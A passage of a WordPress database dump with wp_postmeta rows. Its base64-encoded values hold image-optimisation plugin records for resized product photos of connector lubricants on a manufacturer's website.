bWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcxMzYsImlkIjoxNjcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTQwLCJpZCI6MTY3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcxNDIsImlkIjoxNjcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzE0NSwiaWQiOjE2NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTQ3LCJpZCI6MTY3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcxNTAsImlkIjoxNjcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTUyLCJpZCI6MTY3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzE1NSwiaWQiOjE2NzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1jb25uZWN0b3ItbHVicmljYW50LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtY29ubmVjdG9yLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWNvbm5lY3Rvci1sdWJyaWNhbnQtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcxNTgsImlkIjoxNjcyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29334, 1671, 'wpfc_optimisation_reduction', '3231478'); 
INSERT INTO `wp_postmeta` VALUES (29335, 1671, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLmpwZyIsIndpZHRoIjo0MTA0LCJoZWlnaHQiOjI3MzEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTIuanBnIiwicmVkdWN0aW9uIjozMjMxNDY3LCJ0aW1lIjoxNDgzNTY3MTcwLCJpZCI6IjE2NzEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzE3MywiaWQiOjE2NzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTgwMHg1MzIuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTgwMHg1MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTgwMHg1MzIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTc2LCJpZCI6MTY3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItNzY4eDUxMS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcxNzksImlkIjoxNjcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xNjAweDEwNjUuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMTYwMHgxMDY1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xNjAweDEwNjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTgzLCJpZCI6MTY3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcxODUsImlkIjoxNjcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzE4OCwiaWQiOjE2NzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTkxLCJpZCI6MTY3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcxOTMsImlkIjoxNjcxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MTk2LCJpZCI6MTY3MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzE5OCwiaWQiOjE2NzF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjcyMDEsImlkIjoxNjcxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29336, 1669, 'wpfc_optimisation_reduction', '9249'); 
INSERT INTO `wp_postmeta` VALUES (29337, 1669, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQuanBnIiwid2lkdGgiOjQxOTYsImhlaWdodCI6MjgwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NzIwNiwiaWQiOiIxNjY5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MSwidGltZSI6MTQ4MzU2NzIwOSwiaWQiOjE2Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjo4MjgsInRpbWUiOjE0ODM1NjcyMTMsImlkIjoxNjY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6NzI3LCJ0aW1lIjoxNDgzNTY3MjE3LCJpZCI6MTY2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6MzY5NCwidGltZSI6MTQ4MzU2NzIyMiwiaWQiOjE2Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0X